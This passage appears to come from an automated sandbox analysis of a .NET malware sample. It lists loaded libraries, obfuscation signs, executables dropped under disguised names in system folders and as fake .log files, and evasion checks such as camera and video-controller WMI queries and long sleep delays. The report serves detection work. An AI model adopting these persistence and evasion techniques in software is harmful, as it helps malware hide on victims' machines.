                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: version.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: mmdevapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: ksuser.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: avrt.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: audioses.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeSection loaded: midimap.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: A5EbyKyjhV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: A5EbyKyjhV.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: A5EbyKyjhV.exeStatic file information: File size 2551808 > 1048576
                          Source: A5EbyKyjhV.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x26e800
                          Source: A5EbyKyjhV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                          Data Obfuscation

                          Source: A5EbyKyjhV.exe, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                          Source: A5EbyKyjhV.exe, 857.cs.Net Code: _736
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC52739E push ebp; retf 0_2_00007FFAAC5273A8
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC513CB9 push ebx; retf 0_2_00007FFAAC513CBA
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC6E752B push ebx; iretd 0_2_00007FFAAC6E756A
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAACAA7967 push ebx; retf 0_2_00007FFAACAA796A
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC507BAC push eax; ret 12_2_00007FFAAC507BAD
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC50739E push ebp; retf 12_2_00007FFAAC5073A8
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6C752C push ebx; iretd 12_2_00007FFAAC6C756A
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAACA87967 push ebx; retf 12_2_00007FFAACA8796A

                          Persistence and Installation Behavior

                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile written: C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\JiQSSPWn.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\HSyuVsJS.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\MYHJZLWg.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\tgLOyLgZ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\RunsezZZ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\UswiSVHk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\JMBKMsmH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\xsCeWCWh.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\pxmXXnNx.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\SHQSLHwr.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\EZjMkwXT.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\XMlAJXRO.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\lPgyvanJ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\ZeaApOeg.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\ejzRghnX.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\DyXMTSsE.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\mEXomrcz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\gdBhXhQN.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Recovery\RuntimeBroker.exeJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\HbVuFfcO.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\PvGkFmYz.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\HLTcvXUr.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\cJayVGAz.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\wYpmLLZJ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\rkXniOKV.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\rAZFtXSs.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\SRkiCrbU.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\PjdKZeCh.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\olJxrfqf.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\gzRpdDAs.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\zuoNrmbc.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\ZPYieGWJ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile created: C:\Users\user\Desktop\PWlCEuly.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\vRqeFZrR.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\jxryOjbr.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\OsAKJQVe.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe File created: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe File created: C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Memory allocated: 1680000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Memory allocated: 1B630000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Memory allocated: C00000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Memory allocated: 1A9A0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Code function: 0_2_00007FFAAC6E6CA9 rdtsc 0_2_00007FFAAC6E6CA9
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 600000
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Thread delayed: delay time: 3600000
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Window / User API: threadDelayed 2487
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Window / User API: threadDelayed 7295
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JiQSSPWn.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HSyuVsJS.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MYHJZLWg.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rkXniOKV.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rAZFtXSs.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tgLOyLgZ.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RunsezZZ.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\UswiSVHk.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SRkiCrbU.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\JMBKMsmH.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\xsCeWCWh.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\pxmXXnNx.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PjdKZeCh.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\olJxrfqf.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\SHQSLHwr.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\EZjMkwXT.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\zuoNrmbc.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gzRpdDAs.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XMlAJXRO.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\lPgyvanJ.log
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe Dropped PE file which has not been started: C:\Users\user\Desktop\PWlCEuly.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZPYieGWJ.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jxryOjbr.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vRqeFZrR.log
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe Dropped PE file which has not been started: C:\Users\user\Desktop\OsAKJQVe.log
